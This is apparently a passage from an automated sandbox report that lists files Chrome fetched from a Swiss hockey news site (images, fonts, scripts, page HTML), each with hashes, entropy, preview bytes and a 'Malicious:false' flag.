                                                                                                                                            SHA-512:0AECE577096BDE0FEF001F771849B2823AD19C02FE03C12802A390EECFDD67C4D03BC6B909620DBC997D9031DB35F61C47F141AA159367C6FE71A65E38C31330
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:130/h:90/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2025/01/IMG_7709.jpg
                                                                                                                                            Preview:RIFF....WEBPVP8X...........Y..VP8 ...../...*..Z.>.<.H%."!1.....l3.B....]...~c~.......>....S...1.....u.g._..Q......._...O...8,.X...kB...? .Z~...2_.s.h...z.T..S.c...e...&...}.cjn...5$.}.j.<...hK;\.N"qu...G5...M..&...,.".NKo.....D....AIqb.Z~...<....H`.GD...S..7n..,g.../.....3........Y...|.y......6.X.i.o.d.e..4r@w....J......{.[E.............,...f..&..&n[....o..!..{. ..qQN.p....[.H.......".Z3h.=D..n`.I.`f..@...by...V.+,...o...X...`Nt.t.#}*...XG....`X;.OzR.S...;w{x.....|...(..D..........SZwfxt....c+....!~...F.l..2........z....Mm.w.!1J...<.}a9L!.J~.o..7.....q...o.(...?........t..0...?..#O]X=...O.g..(...f."4czG.F.L..2....)..m!-n.E.7.>y;3....."t......LEvB]c(.R.vm.x.g.U...kU..L..`....v.....K.\/.*...!...4..I......A...s..h.=..........,-x..".+...2a.../|.K.E...*;......q;..R....4...&..v.Th..t.#.....fZ...V.Ujm.8y..pb..F........[.i...N.PR...i.L....WR..q.d ...r.~..p....@..@Pi8..z..J}..U.3.vk.`.[...n*...=.q.....c.}..'...{Y....Gw...*..^.i.V..w.].\`..l.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 392x272, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):18440
                                                                                                                                            Entropy (8bit):7.950740808511521
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:BD2032E2C51DC8B37D00714BD01E8BF8
                                                                                                                                            SHA1:CAE53C7AAE199FC6D56D2B4A3D00E7A1935E50D0
                                                                                                                                            SHA-256:6EB5C618F52491A842E4E7C473820837661C29FE5866A5A7D2137FF0FA3ECA27
                                                                                                                                            SHA-512:770A02414012F4335EB1EFEC466D0F28F3D4654609AADB4207149356A1170E6DFD885A71826784AFE3DBCE50334E211F3BA8391FC55397BAAF35E427F929FC8B
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100...........................................C...............................!..!..)1(%(1)I9339ITGCGTf[[f.z.......C...............................!..!..)1(%(1)I9339ITGCGTf[[f.z..............."................................................................................sY;....V.(w.....I.)p....ME..[/_. ....N....I.;..X....>.gE{%..y."....v/....3dB........U..f5U.K:f.p5...._....E..^j...m.<.'.O._..g....s.P...'H........z4g...l..Q.n.s.N.6...[.j._.7w..c.V......6.Q:....)...V.L*.d.eV..1.U.wrk+9.......Y.....0.'...w9../[......'..i..r9.r.z./......q...!d..F..S.n...;..gle.}....^..'u.]..M..G...L.G..0L...Ja....DB..\.=...3.t|.e.n.67-.......\dt.~..r..2..s.....4Yk.v\...~..u...N....C='#.....]D..n.....o3NE.R...1.7d.z.dB..4.....h.P.6....]...;L...G..k..Z. ..'q.....Utr.....s4.......K..m..uf7...}.-.N.J.OC...z..F.......b6.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):70
                                                                                                                                            Entropy (8bit):4.528724445269141
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:A49A01A609C4280C13BDB8AE93161551
                                                                                                                                            SHA1:76D0DD4CD8E6FA9AAF391435D67D12058756E9BE
                                                                                                                                            SHA-256:CFF5C90E9B28243B1AC80CFD8CEB2B9D51FFAC1C74EA55FCCDF5A0B33F504E58
                                                                                                                                            SHA-512:336729697C006B85EF4ED8AA9F4EBC3A5F2347F9CE4209EFC431CBDD51B9A62E6DFE3EDD71E54AD3B438F4ADC5F9EAFA10CB64A1C091B0465A9B883D51B11F6C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://dollar.prod.tda.link/v1/componentID/e650f25a18e5a55b769dc6e2495294b4
                                                                                                                                            Preview:[{"code":"fa75bdb4-cc43-11ef-816f-f11c143d577c","type":"componentID"}]
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3946
                                                                                                                                            Entropy (8bit):7.869178205491507
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:8F616320C47367E1F6A988D67E18C6A0
                                                                                                                                            SHA1:46F60EA90380C7578632027CCC862D82F22D742D
                                                                                                                                            SHA-256:42DC7AE5D7942D6896B8D47460B3D5822A0BAB44F1B5C8AED41DD4393FFEEB94
                                                                                                                                            SHA-512:A9E0E981099113232BEB81805D24E24C79E2CC15718D439CAF2753C2E0C38064BD19D3E0EF1CB63BB0E3AEEA613EA88D7847A6CE64C317E101B9A12618AD0D3A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:130/h:90/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/01/IMG_8907.jpg
                                                                                                                                            Preview:RIFFb...WEBPVP8X...........Y..VP8 .....9...*..Z.>.<.H%."!1......hg.V<..b...........m.......|.G..w.9.......]#....=...f...-...>.w..#Q....o$..=.}..w./.>@......7.G...B~..........vO.......'..p....z..>..b)..a.F.....P.4..}..../..[..C....y...XiF..w.T..|.b.y........~..._.E..W'.q]......m.O....\NvX..}..>......Gm..T.M.....0..=.e..K..BVQ....+)..T....u.T......`c#c..1A.s..Z1....(1L.'..p.Nc..[K._Q8f~.4.wE.|&...@.R....K..8......l....K...6he.(n...M.;e.kd.i.../U.E.Z.(.T...7...&{./._?......P.........K9h....j..*...N......uq.....0@uL....j.1x.}z+.s..]..T.[.'...,.t4M.8.....W.@...dA.eF.L.]..Jp..D.../..'.}....TB,...[....$!..$...'.{+}@Q.f.,.G..R.l:}...q.P..q..m.T.1....;:....K/....W.<.G......wm%........2...u...&8...D......~..........b.c....R:..G..$6.....Vig...F....jH[Y....d.<!8.7.. .)....3)...l...7Q..o...QJ&k...+.OI..x...Ut....A9O$.....h....~N.:..pl$cq.ch.xL.S...9....I.3..Lu8.:.......@..`Z..S.H.uf..+...B.J.:....Ynw. ....-...>...E.+IW.aY.F-.X.....v....g......
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3234
                                                                                                                                            Entropy (8bit):7.8374470339751525
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:6240B364B04985BFF9D883A4569E6790
                                                                                                                                            SHA1:85C6C74CA13AEBDB375B38E76E80445366594394
                                                                                                                                            SHA-256:8D6C598B9225E70BB470AD1988FF6FBBE47F11C3E350AA19BB2683B2237F3383
                                                                                                                                            SHA-512:7E4A5050304F9E0DA394DDB189B3282E9761D462AC0AB74B7118266ADC4FBAE217262B439ACCEEB34C6A6B592177D32F9D1F09BC4F83F82BFC90F48172E6BF9B
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:130/h:90/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/12/IMG_9897-1.jpg
                                                                                                                                            Preview:RIFF....WEBPVP8X...........Y..VP8 ....p1...*..Z.>.>.I%."!-.\`...h.@..\E...?.......N...<.}.{.z0.%.....[............VU...q.6w...P/g./.....w.{.dc..C.]..t.#.....u8........d..=.M.0R..p..Y...g..G...u...wy..=>..3H..t1..`p.)u.I.2.X'..]X..Q9Hn./q%.p....l/..N`:11...z,,.y.k...b.n..5."..sb.f..}.;....~.!......d.....i.....d2J.........'b...)}.s.[..-...F=.a..l.?A.YF.>...%.w(...#_-.1R.h........b.....".......#..{j..7...{..\wA.....|....b)....}.U..xg0.OY...zWh*S+..m..Xz.x.lw|NJ...?......(+...........r.]..y.....(.A.\...1.<v*...;fc......l..,n...8..K>..u.*W..X.....J4......=......n..=...WB:`.,.a*.l.{.....(L.'<.x..i..{...!..n.g{K.-o....C4....np..*.Y...YS/2.....ps....\BX..$..e../...^.C'...W......Z1g.L..J.X..)g_t3.F...H.._a.}.TG.R*...,.=.)...*Q.j. ......i.._>...- .3...j....V64.......}....-N.9...`......1.n(2.k..:..J...$6.}:2....U..+.V...y.iq.x.|...k.D1...J[c.vx_...p...+9.g8..n~X.[.`9.h.`H.X...[.....z......Ns...F..k|.f...MEN....m.bp.a".r...*......ud....].@..$...9.{.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 130x90, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4927
                                                                                                                                            Entropy (8bit):7.822238228647271
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:02E8F23E0CD8892D3FC4BCBB72BF21D5
                                                                                                                                            SHA1:996CA5FFFF14A047E94DF5D0B71E6245DF36C8EB
                                                                                                                                            SHA-256:292CBBF9A952E74618468A57F8AB216BEF79F0AA432111E74F7FB90AABB4AF2B
                                                                                                                                            SHA-512:63D3169860A9F04D8773EBC1F8DAA3AE55132E3AEBDBD5AEB19B00E8A3147078035BB0E51AAC1EA6A258E43BD9BF175D95418ECC2B5BB67C58CC473D024B7EAB
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................Z..........C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.......Z...."................................................................................k..Kix.r<..\t..o...i..3s....e5%u.}.+z...{........s..4...."+R.#."....W.t..F\.A...<.S7...can~..... ..T..=..f>..m..P$.4,}."X.../h..n...k.)s...F..Ds.Z...7&.y./.....&47.1}[)..>l'.dU...h...y.{}...;AR.\..A....1T....W-.7.fg........"..&..3f./Ugd.R..:.h])./...).............................!..12."#$A...........$.f ...r.........LZ....f..........+y..,B{{G.Uf..5rQ...@V...#.=...%._B.U.L...........f.05.oy......:..[P.5.oh..h....".?m..+.Z....k..d..V.S........."|.C.....Yg0T..I.U.ZXh/G1..u..\N..*...J....`.......k3B|$a..c..Z...bk.2r...X._...(~....b&s...F...8i..cA...e .3.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 392x272, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):23715
                                                                                                                                            Entropy (8bit):7.970255044002673
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:DF273DAE26DB3D6580363A049D39E0EC
                                                                                                                                            SHA1:F18C135E123D8EF00A1845E2ECF70B8402965831
                                                                                                                                            SHA-256:1BD6F60C84F104EF0953ED724E0B98CE6208FA6D5C271071102CEC97737E17CD
                                                                                                                                            SHA-512:DAEC8D1C33B08F5F21CDB867EA010F8DD6C9F91E7CBFCACB3583FA96F98C8A8F6561EC7C58181BDA7E5595957D567AF6E99F7DD4997871E798C9110BDD3DFE0B
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100...........................................C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||............"................................................................................f.F.*NR\;Y 'h-....'I..kiKP..toS-..QrK.D.I.......A...UFQ.U..:.j...L.....w..G...'U..].iqu........{<......6o....!.....u............eZ.$.....[.HA"9......'.8...k..P.YC.IK...........&^...+x........[.V.3%.5I.2..v.../{.Z*M'C...)...u.0O..n.%..R.._.[..5.o-....J....G..;.v..[..'........q.Ry..U..1...s.a.1....,...l..h...m.&-J..9.+,..*b.{..).r...b.[cTs.l...#f..2.....$.v....l....,"V..#..Jg8....T.G..C7.d..,..:...K....*...L!Y.mS..L..Xq....*.9..W...7L..x.Ef..e..L.8.T.:.=..zl..9.....H(...LIk..9...v..".Ov.$.....vXf#Y.a-CG..#.0.e?..R..W.'-Uko.t5+..*:j.b
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (2475)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):218588
                                                                                                                                            Entropy (8bit):5.564623072657112
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:673BA6129E010CAD4E0C0E37E5A6D7DD
                                                                                                                                            SHA1:5A5380A9F66A8F9AA612825EFBF92A1DA4E7A671
                                                                                                                                            SHA-256:B71EA4595DC1050F08DF9BF3A90322E3E22F9FBD944259FEF7BBE1AEC043314A
                                                                                                                                            SHA-512:7E234CE23DD6655DC63F542408E6D593AFD876423309AF76FA41A3F71939B1019AD541C80D72547064C267B37020EE50FFBEA8E418EFB658AFF1D4BE0A4D410E
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://translate.googleapis.com/_/translate_http/_/js/k=translate_http.tr.en_US.rn12Fy6SzHc.O/am=ACA/d=1/exm=el_conf/ed=1/rs=AN8SPfrRwmOjAdSBhDjpxyeTlR3OAc-Rbg/m=el_main
                                                                                                                                            Preview:"use strict";this.default_tr=this.default_tr||{};(function(_){var window=this;.try{.var Tg,Ug,Yg,Zg,$g,bh,ch,eh,fh,gh,hh,ih,kh,mh,nh;_.Sg=function(a,b,c){if(a.forEach&&typeof a.forEach=="function")a.forEach(b,c);else if(_.sa(a)||typeof a==="string")Array.prototype.forEach.call(a,b,c);else for(var d=_.nf(a),e=_.mf(a),f=e.length,g=0;g<f;g++)b.call(c,e[g],d&&d[g],a)};Tg=function(a,b){if(b){b=Number(b);if(isNaN(b)||b<0)throw Error("L`"+b);a.B=b}else a.B=null};Ug=function(a,b){return a?b?decodeURI(a.replace(/%25/g,"%2525")):decodeURIComponent(a):""};._.Vg=function(a,b,c){a.j=c?Ug(b,!0):b;return a};_.Wg=function(a,b,c){a.h=c?Ug(b,!0):b;return a};_.Xg=function(a,b,c){a.l=c?Ug(b,!0):b;a.l&&(a.l=a.l.replace(/:$/,""));return a};Yg=/[#\/\?@]/g;Zg=/[#\?]/g;$g=/[#\?:]/g;bh=/#/g;ch=/[#\?@]/g;_.dh=function(a){var b=_.pc();a.g.set("zx",b)};eh=function(a){a=a.charCodeAt(0);return"%"+(a>>4&15).toString(16)+(a&15).toString(16)};fh=function(a,b,c){return typeof a==="string"?(a=encodeURI(a).replace(b,eh),c
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):42
                                                                                                                                            Entropy (8bit):3.0241026136709444
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:32023BB33CFB2A1990A4EF2D85B6AC16
                                                                                                                                            SHA1:23DCC6D4B5BFE00357FD0248BB5955B8E36BB8F1
                                                                                                                                            SHA-256:99C2917EE5B2A01459A923BDD1C676F15EE73B62B87F696E6735312D26F51E12
                                                                                                                                            SHA-512:D052ECEC2839340876EB57247CFC2E777DD7F2E868DC37CD3F3F740C8DEB94917A0C9F2A4FC8229987A0B91B04726DE2D1E9F6BCBE3F9BEF0E4B7E0D7F65EA12
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:GIF89a.............!.......,...........L.;
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):18
                                                                                                                                            Entropy (8bit):3.5724312513221195
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:53AF239EE5D3E261545DEDEDCB6FFD57
                                                                                                                                            SHA1:04CA7E137E1E9FEEAD96A7DF45BB67D5AB3DE190
                                                                                                                                            SHA-256:99EB12F2AB3C4866A353E098FFA3CB7A967E617C49B98480394EC5D8EA92B094
                                                                                                                                            SHA-512:C734E4A5FF5D335A91518DBF47861BDAF8012AF49371DCD2E3350E269C9A5A1CC094114D17C4F5B053F3757B4B07487EBD0D309C91EF97ACF4665CC5D5C9A2D3
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:404 page not found
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (12309), with CRLF, LF line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):360267
                                                                                                                                            Entropy (8bit):5.480757171916536
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:6701809C4A85AD4A348498E4DE6757F0
                                                                                                                                            SHA1:2C2E5D7BB79AAE346C54C260BB43EDEA599BF482
                                                                                                                                            SHA-256:C95A2E1B173C4C99E8D20FD3329C357868189CCB61CEDFD23F19A36BD6880A12
                                                                                                                                            SHA-512:2DD5330AEEB87C14EBDB185E734C7FCFEDF99831A50A1DCA9A75FF25E70CFAAAED51378459B023F474BAA12F1A0C7E4FAF5EEA1F3095B5E5C617C96829E220B3
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/
                                                                                                                                            Preview:..<!doctype html>....<html class=" optml_no_js " lang="fr-FR" prefix="og: https://ogp.me/ns#">......<head>.......<meta charset="UTF-8"/>....<meta name="viewport" content="width=device-width, initial-scale=1">....<link rel="profile" href="http://gmpg.org/xfn/11"/>........<style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... Optimisation des moteurs de recherche par Rank Math PRO - https://rankmath.com/ -->.<title>PHOTHOCKEY - Page d&#039;accueil A LA UNE</title>.<meta name="description" content="PHOTHOCKEY D.couvrez l&#039;essentiel de l&#039;actualit. du hockey sur glace suisse professionnel, amateur, junior et f.minin. News, articles, interviews, chronique,"/>.<meta name="robots" content="follow, index, max-snippet:-1, max-video-preview:-1, max-image-preview:large"/>.<link rel="canonical" href="https://phothockey.ch/" />.<meta property="og:locale" content="fr_FR" />.<meta property="og:type" content="website" />.<meta property="
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2022
                                                                                                                                            Entropy (8bit):7.676389547067509
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:5E99E0192887648BA55AA23CC9EC346A
                                                                                                                                            SHA1:E448D086A7E90BAEB7518FBDD13798E2377F48FA
                                                                                                                                            SHA-256:630774D5E20038D55BF4143BE793C65EAC41F8BE3E132A5D19E2132989D56EDF
                                                                                                                                            SHA-512:3B2990A56891852A719E294E6D64CE17D7F85F4D1E9247C1D2AE2C0681B821129ED2725204B83AEC571AF5EA7874C1B29CE020DF6B30F85D58BDBB1700140FB0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:130/h:90/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/08/0000.jpg
                                                                                                                                            Preview:RIFF....WEBPVP8X...........Y..VP8 ....0....*..Z.>.J.K%..%%..p...@........{.#y7...+....R}..?.X....<.........#.h..._BO.?....w.....S...O...w..r..,....V..o..k+......>.P......#..~..'..IX.K.P.%.2H...p0..5.Y.f.<..J.().....\d.h.P"...T...l.f.-.*i..k.d..]w0..cuw...0B...... &j'..z.?z:...........7.....k..|..BN...j.g.....w>..l..F6 ..|.P.z..-...`..Xu.V?.3.E...0.5(.Ln..B]..Yb...+]y....SzC4.PC.:...v?h.YDlW.P.w..,sF."].Xg...E...r..fd.h......:..h.....P\..^..f*Zm;.....|..^...2....'..d.l./...N..sz..H.H.P..e?c.gc.3.r..K..nD..q%...~.E...).k@..|....R...3.&..9.[.%.=....[.].........7.....]0~bk..yD..X].4....\..~.xb.Iv..).G........r..L.#@...&9.b.M......@......4.........~^.Q.7..,.@.Lq..E&....e6..D.$`.Su......OpP.Fc.$.<.Z.n3..?#.....o..[..L@;s......xJ._........$.....;.....h*.*....f;!..0^...F...L..MB....Cy}3.^..U.<f.Z`f.Y.tM....q....n.v.....q......D~..E....F.{B$gG.....4<Zk....C.={|I.N.......o.b......_.1......,..V.q*..+y..&C..lp.UJ.*.....\..\..mX>..-]..0....?)...%
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1572)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):20471
                                                                                                                                            Entropy (8bit):5.584304156248125
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:41004A20C7E924677BE5801EF1E6EF09
                                                                                                                                            SHA1:B6E8C17BD17B38A262254E7AFD529DA3695B47E1
                                                                                                                                            SHA-256:7D219CEA3316552D5927B5B7528F1192223374DD1B9DD58C48E5DE057AF6E3F1
                                                                                                                                            SHA-512:3005AC96EBF9F1E876031E63282029C3B1653CC7110BBDE5C380DBCAB54BD272F6DD5C8A74D44145F8F47F175F4B3CAF6944DFE79921B7F0F333AB24D2097D38
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://fonts.googleapis.com/css?family=Google%20Sans%3A400%2C500
                                                                                                                                            Preview:/*. * See: https://fonts.google.com/license/googlerestricted. */./* armenian */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v62/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiIUvaYr.woff2) format('woff2');. unicode-range: U+0308, U+0530-058F, U+2010, U+2024, U+25CC, U+FB13-FB17;.}./* bengali */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v62/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiAUvaYr.woff2) format('woff2');. unicode-range: U+0951-0952, U+0964-0965, U+0980-09FE, U+1CD0, U+1CD2, U+1CD5-1CD6, U+1CD8, U+1CE1, U+1CEA, U+1CED, U+1CF2, U+1CF5-1CF7, U+200C-200D, U+20B9, U+25CC, U+A8F1;.}./* canadian-aboriginal */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v62/4UasrENHsxJlGDuGo1OIlJfC6l_24rl
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):17376
                                                                                                                                            Entropy (8bit):7.981834733142247
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:814C05D288455F4D3A10B7502033FBE0
                                                                                                                                            SHA1:01C9E3128A8558F1E46077D0C9B930557CFE85F8
                                                                                                                                            SHA-256:5E03EAEA3E184379133F5CC0D6110311B2CD592F1174C2E93DE69F7B38EDAB75
                                                                                                                                            SHA-512:79E23D1DF087FA995196203E7926E15491E6BE3DA71370605C4579920F0462081B2D9A11112DDBD10AC7E7817F2F410CF21077EBB971D79E298BA25C5F6E5313
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:392/h:272/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2022/05/4Y0A4858.jpg
                                                                                                                                            Preview:RIFF.C..WEBPVP8X..............VP8 .B.......*....>.D.I...&.x.....fl..<....@..[...Ln...c..............._..=y..}..........<.~........{.....?.?\.T..?.=.?m.;.u........................K..._~...m...>..;.w..........2...~....W.....>...........?.|..9...c......\...;..........+.R...u.............u....y.l...?x... y..PCjiU.8.*....q!..#I...7...5tA/.,..rH.B8.|+B}Q....J....G5....q.@..~...L;C0P....?.lq..B....8N..l0.NTO..q..D{.RT...p`7.D..M....xb.]..o.....0N.g..[.V}x!r...R...)W..uJ....p..t.a.1.P.)t...?.(S.......F.Q........2..2..P...p67.w3.u...#v@..\.;3p....Au..~Ew..K.T..U...>X.P.?...."C..$,...-.W.i..(....v.P.8p..:.ET<.<f...?..v..0.....v[*r...l.,J.]..k&[l.b.1.<.+.uN.....h.o.....K".. 1.H.a.r@....P..G..H$..N....F..7f..k..`cp.....W...II...x>E.........o....w.....^h.?..;.> b...U..-.U.Y...x.6...;..4....\$.,..?}....$O{.B..*....:.MS7..2.!.u..'k.....TGN.O..s..D.n.H....p..r.Z.(h....*..x......]...A..5V..G ;......o..R.....b._........n../'......&......Q..1....p. ...3
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 130x90, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3642
                                                                                                                                            Entropy (8bit):7.7050805674418195
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:887B6B0E6B4126A34FC30BAA868CF1CF
                                                                                                                                            SHA1:A0DFC8FD17F2ADE0467F2B33B21E22D2446B2D63
                                                                                                                                            SHA-256:05A0CD1113F7B9ADA93BE4AAF69C8EF688B604606F930D8E79DD71172D706CD2
                                                                                                                                            SHA-512:0920B478C21431533C5778927F592A0437C5A0853B2AB3554ECA59F7C4A46604275D2D313C9722E88D93C786208D5472C2ACBFA9332F920CB2C7EEF7BBE692B3
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................Z..........C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.......Z...."..............................................................................RW.r{I).+)....,...s.#.J.........`...H..Z.....Q..[....b<.....<C%.G..k..+...;...{c..QKi;H.Z?.....V$........z.<c/..|}j..W(gj.=..&.S...........s.rU..y.K...P......T....>=..k.S.......v.R{.=...Y.....U.\S.]..s[CZt..B.....q.......XX2k.b._......._.1i..t....L_.....&...........................!1..."A2Q...........@.......8.K.%.=.....>.s. .....1.g...c..y.u...';~F.........C...........G .N......^%..L......8.d...67..l8...1...,W...i..7...s.H.x....W.e.n......i..J..:..iU.)\.w5S.[........G......[.U....V0..?.FGKi..Gpb.@.._#....c.M.kkI0.O....ic...<.b....|RRD.f%q:.l..T
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1572)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):18042
                                                                                                                                            Entropy (8bit):5.340669711357762
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:25FA9BF73F736D6E525EEEF13E609AF0
                                                                                                                                            SHA1:15A55E33DCE3AA64B43C7FFFEC2E0F8FEE7E391D
                                                                                                                                            SHA-256:194B0B6987D98574284A790E1E71B5B242BDF5BDD685969D7E0B0BAE7F9CEE4E
                                                                                                                                            SHA-512:E4A339AF10BF9A55C9E6C3103D7957464747B0DF539C0B9086B40916E342D5DF4F02BB269DC489670F94DF4AE7F9FB1109259256E138A114807850793A9F88A0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://fonts.googleapis.com/css?family=Open+Sans%3A600%2Cregular%2C500&subset=latin&1&display=swap&ver=4.1.12
